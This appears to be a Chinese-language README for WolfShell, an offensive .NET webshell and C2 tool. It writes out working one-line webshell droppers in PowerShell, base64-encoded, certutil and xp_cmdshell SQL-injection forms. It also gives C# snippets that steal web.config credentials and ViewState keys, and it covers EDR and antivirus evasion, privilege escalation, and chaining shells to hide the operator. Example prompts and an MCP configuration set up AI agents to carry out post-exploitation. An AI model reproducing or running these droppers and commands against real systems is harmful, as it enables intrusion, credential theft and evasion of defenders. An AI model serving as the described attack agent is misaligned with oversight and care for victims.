WolfShell V3.4 新增AI提权等14个MCP工具
金刚狼:首款支持AI渗透的高级WebShell & C2管理工具
金刚狼是一款为微软 .NET/ASPX 环境打造的高级 WebShell 与 C2 管理工具,面向安全研究与渗透测试(红队)使用,提供强大的命令执行、提权与内网穿透能力;内置大量渗透工具并集成 AI 智能渗透 辅助,支持内存加载、无文件落地操作,从而实现高隐蔽性的内网渗透与灵活扩展。
🚀 核心优势
- AI智能渗透:支持使用自然语言指挥AI操作WebShell执行命令进行渗透。
- 高效隐蔽的通信: 采用 二进制流 传输协议,确保通信的高效性与隐蔽性。
- 端到端安全加密: 所有传输 Payload 均经过 AES加密 保护,且每次通信使用 随机密钥,保障数据安全。
- 无痕运行: 支持直接在 内存中加载并执行代码,最大程度避免在磁盘留下痕迹,显著提升操作隐蔽性和安全性。
- 内网级联WebShell控制: 通过现有已控的WebShell,无需部署代理或配置端口转发,即可连接控制更深层内网环境中的WebShell。
- Hacking后渗透:通过已控的 WebShell 在内存中加载渗透工具,无需部署代理或配置端口转发,即可实现便捷高效的内网横向渗透。
- 语言特征: 服务端(webshell)及payload均为纯英文,只有提供的WebShell变种文件包含英文、日文、韩文。
🔥 功能特性
- Shell:支持ASPX、ASHX、ASMX、内存马、EXE、PowerShell、DLL、MSbuild、ysoserial反序列化等9种类型)。
- 正向马:支持个人机植入正向后门级联控制整个内网,EXE、PS1、DLL、MSbuild等,支持IIS端口复用。
- 内存马:ASPX一键注入内存马,任意路径访问,每次都可修改shell地址连接,干扰蓝队分析。
- Cmd命令执行: 在目标系统上直接执行任意 CMD 命令。魔改whoami防止被EDR记录并报警。
- 文件管理: 在目标系统上枚举目录文件、新建文件、文件上传、EXE执行、重命令、删除、设置文件时间等。
- PowerShell执行: 支持执行 PowerShell 代码和命令。魔改whoami防止被EDR记录并报警。
- Shellcode执行: 可在目标环境内直接执行原生的 Shellcode,一键上线Cobalt Strike、Metasploit。
- .NET程序执行: 支持内存加载执行自定义.NET程序集,快速扩展后渗透能力。
- 内存加载扫描器: 只需研发单个IP的.NET程序,通过该模块即可变成内存加载的C段扫描器。
- C#代码执行: 支持动态加载与执行 C# 代码,复制案例代码,给AI修改快速扩充战力。
- ValidationKey:提取ValidationKey、Validation、DecryptionKey等ViewState反序列化信息。
- web.config读取:提取数据库连接信息(数据库名、用户、密码)、SMTP/邮件服务器用户密码等。
- 端口转发: 实现本地端口到远程内网主机的映射,方便安全地访问内部网络服务。
- HTTP代理: 一键内存注入Suo5高性能 HTTP 隧道代理工具。
- EfsPotato: 利用系统服务漏洞进行权限提升。
- BadPotato: 利用系统服务漏洞进行权限提升。
- 内网级联Cmd命令执行: 支持级联内网第2层 WebShell 执行 CMD 命令进行横向移动。
- 内网级联PowerShell执行: 支持级联内网第2层 WebShell 执行 PowerShell 命令进行横向移动。
- SshCmd:SSH 远程命令执行工具,支持对内网主机的命令执行、文件上传下载实现横向移动。
- MysqlCmd:MySQL 数据库连接工具,支持连接内网MySQL,执行查询、导入导出等数据库操作。
- MssqlCmd:SQL Server数据库连接工具,支持连接内网数据库,执行查询、导入导出、横向移动、命令执行、Potato提权等。
- SharpWeb:浏览器凭据抓取工具,支持提取已保存的 Chrome、Firefox、Edge 登录信息与凭据。
- 密码读取: IISpwd wifipwd FileZillaPwd firefoxpwd XshellPwd GetPwd FirefoxHistory FirefoxCookie
- 漏洞检测:MS17010 SMBGhost HikvisionPoc ActivemqPoc Struts2Poc WeblogicPoc CVE-2022-36537 CVE-2024-47176 CVE-2022-27925 CVE-2024-27956
- 横向工具:wshell SmbExec WmiExec WmiExec2 AtExec MssqlCmd MmcExec ShellExec ShellBrowserExec
- AI免杀:接入AI人工智能,聊个天就能免杀WebShell。
- Ladon:内网渗透工具集,内存加载无文件落地,包含端口扫描、资产探测、密码审计、漏洞检测、漏洞利用、横向移动等。(工具在集成中,目前已完成10多种协议资产探测,其它模块暂未支持,和potato一样,无法集成所有工具,有些功能可能得使用原程序)
- AddUser: 绕过杀软EDR\XDR添加系统用户、管理员、域用户、域管理员工具。
- NoPowerShell:禁用或没有PowerShell执行PowerShell命令、代码、文件功能。
辅助功能
AI人工智能
- AI免杀:接入AI人工智能,聊个天就能免杀WebShell。
- AI渗透:内置MCP服务器,使用自然语言指挥AI后渗透。
加密解密
- 支持加密算法: BASE64、HEX、ASCII、PowerShell、MD5、SHA1、SHA256、URL编码
- 支持解密算法: BASE64、HEX、ASCII、PowerShell、URL编码
安装与使用
- 下载WolfShell
git clone https://github.com/0x7556/wolfshell.git
-
目标环境
- 确保目标环境支持ASPX、ASHX、ASMX等脚本
- .NET >= 3.5,Windows 7-Windows 2026
-
上传WolfShell
- 将WolfShell文件上传到目标服务器,客户端支持生成ASPX、ASHX、内存马等9种类型。
- WebShell脚本: https://github.com/0x7556/wolfshell/tree/main/shell
-
访问WebShell
- 通过工具客户端连接WebShell,默认密码 WolfShell,修改密码可使用工具上的WolfHash加密。
使用环境
客户端
- 本机操作系统: Windows 7-Windows 2026
- 本机.NET 版本: .NET Framework 4.8
Shell
- 目标操作系统: Windows 7-Windows 2026
- 目标.NET 版本: >=.NET Framework 3.5
漏洞 通用GetShell命令
具备命令执行或SQL注入条件时,可通过以下6种方法写入 金刚狼 WebShell
PowerShell写入WebShell wolf.aspx
powershell -Command "Set-Content -Path 'wolf.aspx' -Value '<%@ Page Language=\"C#\" %><%if (Request.Cookies.Count != 0) { byte[] k = Encoding.Default.GetBytes(\"ca63457538b9b1e0\"); System.IO.Stream s = Request.InputStream; byte[] c = new byte[s.Length]; s.Read(c, 0, c.Length); System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\"K\").Equals(this); }%>'"
PowerShell命令 Base64写入WebShell wolf.aspx
powershell -EncodedCommand UwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAIgB3AG8AbABmAC4AYQBzAHAAeAAiACAALQBWAGEAbAB1AGUAIAAnADwAJQBAACAAUABhAGcAZQAgAEwAYQBuAGcAdQBhAGcAZQA9ACIAQwAjACIAIAAlAD4APAAlAGkAZgAgACgAUgBlAHEAdQBlAHMAdAAuAEMAbwBvAGsAaQBlAHMALgBDAG8AdQBuAHQAIAAhAD0AIAAwACkAIAB7ACAAYgB5AHQAZQBbAF0AIABrACAAPQAgAEUAbgBjAG8AZABpAG4AZwAuAEQAZQBmAGEAdQBsAHQALgBHAGUAdABCAHkAdABlAHMAKAAiAGMAYQA2ADMANAA1ADcANQAzADgAYgA5AGIAMQBlADAAIgApADsAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtACAAcwAgAD0AIABSAGUAcQB1AGUAcwB0AC4ASQBuAHAAdQB0AFMAdAByAGUAYQBtADsAIABiAHkAdABlAFsAXQAgAGMAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAcwAuAEwAZQBuAGcAdABoAF0AOwAgAHMALgBSAGUAYQBkACgAYwAsACAAMAAsACAAYwAuAEwAZQBuAGcAdABoACkAOwAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQAuAEwAbwBhAGQAKABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBSAGkAagBuAGQAYQBlAGwATQBhAG4AYQBnAGUAZAAoACkALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGsALAAgAGsAKQAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKABjACwAIAAwACwAIABjAC4ATABlAG4AZwB0AGgAKQApAC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAIgBLACIAKQAuAEUAcQB1AGEAbABzACgAdABoAGkAcwApADsAIAB9ACUAPgAnAA==
cmd命令 echo & certutil 写入WebShell wolf.aspx
echo 3c25402050616765204c616e67756167653d2243232220253e3c2569662028526571756573742e436f6f6b6965732e436f756e7420213d203029207b20627974655b5d206b203d20456e636f64696e672e44656661756c742e476574427974657328223961613337623163323561303834653022293b2053797374656d2e494f2e53747265616d2073203d20526571756573742e496e70757453747265616d3b20627974655b5d2063203d206e657720627974655b732e4c656e6774685d3b20732e5265616428632c20302c20632e4c656e677468293b2053797374656d2e5265666c656374696f6e2e417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528224b22292e457175616c732874686973293b207d253e > w.hex && certutil -f -decodehex w.hex wolf.aspx && del w.hex
cmd命令 echo 写入WebShell wolf.aspx
echo ^<%@ Page Language="C#" %^> > wolf.aspx && echo ^<% if (Request.Cookies.Count != 0) { >> wolf.aspx && echo byte[] k = Encoding.Default.GetBytes("ca63457538b9b1e0"); >> wolf.aspx && echo System.IO.Stream s = Request.InputStream; >> wolf.aspx && echo byte[] c = new byte[s.Length]; >> wolf.aspx && echo s.Read(c, 0, c.Length); >> wolf.aspx && echo System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("K").Equals(this); >> wolf.aspx && echo } %^> >> wolf.aspx
SQL注入 xp_cmdshell写入WebShell wolf.aspx
'; EXEC xp_cmdshell 'echo ^<%@ Page Language="C#" %^> > C:\inetpub\wwwroot\wolf.aspx && echo ^<% if (Request.Cookies.Count != 0) {>> C:\inetpub\wwwroot\wolf.aspx && echo byte[] k = Encoding.Default.GetBytes("ca63457538b9b1e0");>> C:\inetpub\wwwroot\wolf.aspx && echo System.IO.Stream s = Request.InputStream;>> C:\inetpub\wwwroot\wolf.aspx && echo byte[] c = new byte[s.Length];>> C:\inetpub\wwwroot\wolf.aspx && echo s.Read(c, 0, c.Length);>> C:\inetpub\wwwroot\wolf.aspx && echo System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("K").Equals(this);>> C:\inetpub\wwwroot\wolf.aspx && echo } %^> >> C:\inetpub\wwwroot\wolf.aspx'; --
编译EXE程序正向马C2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:wolf.exe wolf.cs
PS:可自行修改,添加启动项,实现持久化,结合级联功能,内网横行。 也可以根据该代码修改成DLL,通过DLL劫持级联控制内网多台机器。
PowerShell正向马C2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File wolf.ps1
IIS端口复用后门
若目标存在IIS,不管是PowerShell还是exe版,均支持端口复用
功能示例
自定义.NET程序执行
.NET程序执行: 支持内存加载执行自定义.NET程序集,快速扩展后渗透能力。
AI人工智能
AI智能免杀
使用AI兔杀金刚狼 WebShell 服务端
AI智能渗透
Cherry Studio MCP配置
"mcpServers": {
"xf5pBIECy50rKmx53Gy7n": {
"name": "WolfShellMCP",
"type": "stdio",
"description": "",
"isActive": true,
"command": "C:\\Users\\Administrator\\Downloads\\wolfshell-main\\WolfShellMCP.exe",
"args": [],
"env": {
"WOLFSHELL_API": "http://127.0.0.1:7556"
}
}
- 其它客户端同理,欢迎提交其它客户端配置代码,跨平台MCP,支持Windows/Linux/MacOS等操作系统
- Kali下使用请下载 lnx 版本,环境变量 WOLFSHELL_API 设置成 金刚狼 所在Windows机器的远程API地址
- 金刚狼AI Shell MCP:https://github.com/0x7556/PentestMCP/releases/tag/wolfshellmcp3.4
启动AI智能服务器API
点击金刚狼Shell工具标签“AI->MCP”,找到按钮“API MCP Server”
1. AI渗透 通过金刚狼 Shell 执行 CMD 命令(使用 Shell 地址和密码)
配合相关漏洞让AI自动获取shell,以成功执行命令为验收标准,防止AI幻觉或检测200状态误报为成功GetShell。
示例提示词:
- 使用金刚狼 http://192.168.50.106/shell.aspx Wolf8888 执行 CMD 命令: whoami
- 使用金刚狼 http://192.168.1.11/wolf.aspx WolfShell 执行 CMD 命令:查看系统信息

2. AI渗透 通过金刚狼客户端预配置的 ID 执行 CMD 命令
优点不会向AI泄露目标Shell和密码
示例提示词:
- 使用金刚狼 ID 为 9 的 Shell 执行 CMD 命令:查看当前用户

3. AI渗透 通过金刚狼 Shell 执行 PowerShell 命令(使用 Shell 地址和密码)
配合相关漏洞让AI自动获取shell,以成功执行命令为验收标准,防止AI幻觉或检测200状态误报为成功GetShell。
示例提示词:
- 使用金刚狼 http://192.168.1.11/wolf.aspx WolfShell 执行 PowerShell 命令:whoami
- 使用金刚狼 http://192.168.1.11/wolf.aspx WolfShell 执行 PowerShell 命令:查看系统信息

4. AI渗透 通过金刚狼客户端预配置的 ID 执行 PowerShell 命令
优点不会向AI泄露目标Shell和密码
示例提示词:
- 使用金刚狼 ID 为 9 的 Shell 执行 PowerShell 命令:ipconfig
- 使用金刚狼 ID 为 9 的 Shell 执行 PowerShell 命令:查看当前 IP

5. AI渗透 金刚狼 WolfShell 视频演示
https://github.com/0x7556/hackvideo/blob/main/Wolf%20AI%20Shell.mov
6. AI渗透 金刚狼 文件上传
示例提示词:
- 使用金刚狼 http://192.168.50.106/shell.aspx Wolf8888 上传文件 C:\Users\Administrator\Desktop\TestTest\wolf.exe 到目标 的Public目录
- 使用金刚狼 ID为9 执行 上传文件 C:\Users\Administrator\Desktop\TestTest\wolf.exe 到目标 的Public目录

7. AI渗透 金刚狼 EfsPotato提权
示例提示词:
- 使用金刚狼 ID为9 执行EfsPotato执行 whoami
- 使用金刚狼 http://192.168.50.106/shell.aspx Wolf8888 EfsPotato执行 whoami

8. AI渗透 金刚狼 BadPotato提权
示例提示词:
- 使用金刚狼 ID为9 执行 BadPotato执行 whoami
- 使用金刚狼 http://192.168.50.106/shell.aspx Wolf8888 BadPotato执行 whoami

级联控制内网Shell & C2
级联内网第3层WebShell 执行Cmd命令
通过入口点 192.168.50.106 级联内网 192.168.50.159 再次级联下一层内网 192.168.50.69 WebShell 执行命令
PS: 当然也可级联外网,比如抓了一些服务器当跳板,真正要搞的目标在第3层,这样就很难被追踪或溯源到你的真实IP了

级联内网第2层WebShell 执行Cmd命令
通过入口点 192.168.50.159 级联内网 192.168.50.106 WebShell执行命令

WebShell入口点 执行Cmd命

WebShell入口点 执行PowerShell命令/代码
- whoami代码实现非系统whoami
- 支持命令执行、代码执行 长度9K
- 输入info、ver可查看操作系统版本、位数、.NET版本、PowerShell版本信息
- 输入whoami、username可自动转成对应powershell代码查看用户信息
- Base64加密代码执行 示例 base64:ZWNobyBXb2xmU2hlbGw=
PS C:\Users\admin>whoami
whoami: IIS APPPOOL\DefaultAppPool
Username: WIN-021V7TK43N5$
PS C:\Users\admin>info
Operating System Version: Microsoft Windows Server 2019 Datacenter 64 bit
Version Number: 10.0.17763
PowerShell Version:
5.1.17763.1
.NET Detailed Versions:
PSChildName Version Release
----------- ------- -------
Client 4.7.03190 461814
PS C:\Users\admin>base64:ZWNobyBXb2xmU2hlbGw=
WolfShell
PS C:\Users\admin>Write-Host "Current User:`n$env:USERNAME"
Current User:
WIN-021V7TK43N5$

文件管理

C#代码执行
获取 ValidationKey 示例代码
- ValidationKey:提取ValidationKey、Validation、DecryptionKey等ViewState反序列化信息
using System;
using System.Reflection;
using System.Web.Configuration;
public class Eval
{
public string eval(Object obj)
{
var sy = Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
var gac = mkt.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
var cg = (MachineKeySection)gac.Invoke(null, new object[0]);
return "ValidationKey: " + cg.ValidationKey + " | " + "Validation: " + cg.Validation + " | " + "DecryptionKey: " + cg.DecryptionKey + " | " + "Decryption: " + cg.Decryption + " | " + "CompatibilityMode: " + cg.CompatibilityMode;
}
}

扫描C段存活主机 示例代码
using System;
using System.Net;
using System.Net.NetworkInformation;
using System.Text;
using System.Threading.Tasks;
public class Eval
{
public string eval(Object obj)
{
StringBuilder iplist = new StringBuilder();
string baseIP = "192.168.1.";
PingOptions options = new PingOptions();
options.DontFragment = true;
var tasks = new Task[254];
for (int i = 1; i < 255; i++)
{
int ipSuffix = i;
tasks[i - 1] = Task.Run(() =>
{
using (Ping myPing = new Ping())
{
PingReply reply = myPing.Send(baseIP + ipSuffix, 120);
if (reply.Status == IPStatus.Success)
{
lock (iplist)
{
iplist.AppendLine("Alive IP: " + reply.Address.ToString());
}
}
}
});
}
Task.WaitAll(tasks);
return iplist.ToString();
}
}

CMD命令执行 示例代码
using System;
using System.Diagnostics;
public class Eval
{
public string eval(Object obj)
{
try
{
Process process = new Process();
process.StartInfo.FileName = "cmd.exe";
process.StartInfo.Arguments = "/c whoami";
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();
string result = process.StandardOutput.ReadToEnd();
process.WaitForExit();
return result;
}
catch (Exception ex)
{
return "Error occurred: " + ex.Message;
}
}
}

获取web.config密码 示例代码
- web.config读取:提取数据库连接信息(数据库名、用户、密码)、SMTP/邮件服务器用户密码等。
using System;
using System.Configuration;
using System.Text;
public class Eval
{
public string eval(Object obj)
{
try
{
var connectionStrings = ConfigurationManager.ConnectionStrings;
var appSettings = ConfigurationManager.AppSettings;
var result = new StringBuilder();
foreach (ConnectionStringSettings connectionString in connectionStrings)
{
result.AppendLine("Connection string name: " + connectionString.Name);
result.AppendLine("Connection string value: " + connectionString.ConnectionString);
result.AppendLine();
}
result.AppendLine();
foreach (string key in appSettings.AllKeys)
{
result.AppendLine("Key: " + key + ", Value: " + appSettings[key]);
}
return result.ToString();
}
catch (Exception ex)
{
return "Error occurred: " + ex.Message;
}
}
}

加密解密算法
支持加密算法: BASE64、HEX、ASCII、PowerShell、MD5、SHA1、SHA256、URL编码
支持解密算法: BASE64、HEX、ASCII、PowerShell、URL编码
金刚狼密码

ASCII码加密

BASE64解密

HEX十六进制解密

Potato提权示例
efspotato提权

badpotato提权

内网扫描示例

端口转发示例

HTTP代理示例

Hacking后渗透
SSH远程命令执行示例
Usage:
sshcmd 192.168.50.128 22 root toor id
sshcmd 192.168.50.128 22 root toor download /tmp/down.rar c:\down.rar
sshcmd 192.168.50.128 22 root toor upload c:\upload.rar /tmp/upload.rar
Keybord
sshcmd 192.168.50.128 22 root toor download2 /tmp/down.rar c:\down.rar
sshcmd 192.168.50.128 22 root toor upload2 c:\upload.rar /tmp/upload.rar

Mysql数据库连接示例
mysqlcmd host port user pass dbname sqlstr
mysqlcmd host port user pass dbname sqlb64
Demo:
mysqlcmd 192.168.50.139 3306 root WolfShell mysql info
mysqlcmd 192.168.50.139 3306 root WolfShell mysql ""SELECT VERSION(); ""
mysqlcmd 192.168.50.139 3306 root WolfShell mysql ""SELECT 3+5 ""
mysqlcmd 192.168.50.139 3306 root WolfShell mysql c2VsZWN0IDMrNQ==";

读取浏览器密码示例
- SharpWeb:浏览器凭据抓取工具,支持提取已保存的 Chrome、Firefox、Edge 登录信息与凭据。
Usage:
SharWeb arg0 [arg1 arg2 ...]
Arguments:
all - Retrieve all Chrome, FireFox and IE/Edge credentials.
full - The same as 'all'
chrome - Fetch saved Chrome logins. e.g. -d Directory
firefox - Fetch saved FireFox logins. e.g. -p masterkey -d Directory
edge - Fetch saved Internet Explorer/Microsoft Edge logins.
Demo:
SharWeb all
SharWeb chrome
SharWeb chrome -d C:\Output
SharWeb firefox -p mymasterkey -d C:\Output
SharWeb edge
=======================================================================

Ladon内网渗透工具示例
20251106 主要集成以下探测功能,其它功能暂未支持
Usage:
Ladon whoami
Ladon 192.168.50.159/24 ICMP ICMP存活主机探测
Ladon 192.168.50.159/24 PortScan 开放端口服务扫描
Ladon 192.168.50.159/24 WebScan 网站标题、中间件
Ladon 192.168.50.159/24 SmbInfo SMB存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 NbtInfo NBT存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 WmiInfo WMI存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 LdapInfo LDAP存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 RdpInfo RDP存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 SmtpInfo SMTP存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 HttpInfo HTTP存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 WinrmInfo Winrm存活主机探测、NTLM系统信息
Ladon 192.168.50.159/24 MssqlInfo SQL数据库主机探测、NTLM系统信息
Ladon 192.168.50.159/24 FtpInfo FTP存活主机探测
Ladon 192.168.50.159/24 T3Info Weblogic协议探测
Ladon 192.168.50.159/24 CiscoInfo Cisco路由器探测
Ladon 192.168.50.159/24 SnmpInfo SNMP设备探测,如路由器、交换机等
Ladon 192.168.50.159/24 OxidInfo Windows多网卡主机探测
Ladon 192.168.50.159/24 EthInfo Windows多网卡主机探测
Ladon http://0x7556.org WPinfo WordPress版本、插件探测、漏洞
Ladon 192.168.50.159/24 DnsInfo DNS存活主机探测、域名识别
SMB协议NTLM信息OS操作系统识别

WebScan 网站标题、中间件扫描

端口扫描 示例
PortScan 192.168.50.159
PortScan 192.168.50.159 80,22,135,445

MS17010 漏洞检测

SQL Server横向移动 数据库提权

Xshell密码读取

webkey 密码读取
解析web.config 获取ValidationKey (ViewState反序列化 Exchange、SharePoint后门)

CVE-2025-55182 Next.js Rce 漏洞利用
[+]CVE-2025-55182 CVE-2025-55182 Next.js Rce 漏洞利用
[+]NextJSexp CVE-2025-55182 Next.js Rce 漏洞利用

EXP本地使用
本机使用 Hacking 里的工具EXP,运行HackTest.exe后,添加Shell: http://127.0.0.1:8080/wolfshell
内存加载 内网扫描器
内存加载扫描器
- 只需研发单个IP的.NET程序,通过该模块即可变成内存加载的C段扫描器。
- 如只需实现对1个IP的检测、漏洞利用等工具,注意:类和方法需为 Public
自定义工具 原始用法
F:\py>urltitle.exe 192.168.50.1
URL: http://192.168.50.1/ | Status: 200 | Banner: httpd/2.0 | Title: No Title
远程内存加载 变身 内网C段扫描器
使用方法:
- 将目标 EXE 拖放到“ExePath”文件路径输入框。
- 在“C 段”输入框中填写要扫描的网段(例如 192.168.1.0/24)。
- 点击“Scan”按钮开始扫描。扫描行为和结果由所加载的 EXE 功能决定。
说明:
- 加载器默认先通过 ICMP(ping)探测目标是否存活,只有存活的主机才会被加载并执行自定义 EXE。
- 若目标网络禁用 ICMP 响应,请取消勾选“先行探测/ICMP”选项以跳过探测步骤。
–
内存加载扫描器 内置MS17010漏洞检测

免责声明
- 使用WolfShell时,请遵循相关法律法规,确保在授权的环境中进行测试和使用。
- 本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。
问题反馈
欢迎任何形式的贡献!请提交问题、建议或拉取请求。
许可证
本项目采用MIT许可证,详细信息请参见LICENSE文件。
资源链接
已集成或即将加入的工具,工具采用内存加载,有些工具未解决兼容性问题,如(SweetPotato\GodPotato,可能得上传目标在cmd下执行)
- Ladon(内网渗透框架):https://github.com/k8gege/Ladon (功能非常丰富,正在研究中)
- gpt4free(AI免费API):https://github.com/xtekky/gpt4free
- SharpWeb(浏览器密码读取):https://github.com/djhohnstein/SharpWeb
- suo5代理(HTTP隧道代理):https://github.com/zema1/suo5
- BadPotato(提权工具):https://github.com/BeichenDream/BadPotato
- EfsPotato(提权工具):https://github.com/zcgonvh/EfsPotato
- CVE-2025-59287漏洞 .net反序列化 内存正向马: https://github.com/0x7556/CVE-2025-59287
关注
- 欢迎大家关注公众号和Github,您的关注、点赞、反馈,将是软件更新的动力来源!
更多推荐



所有评论(0)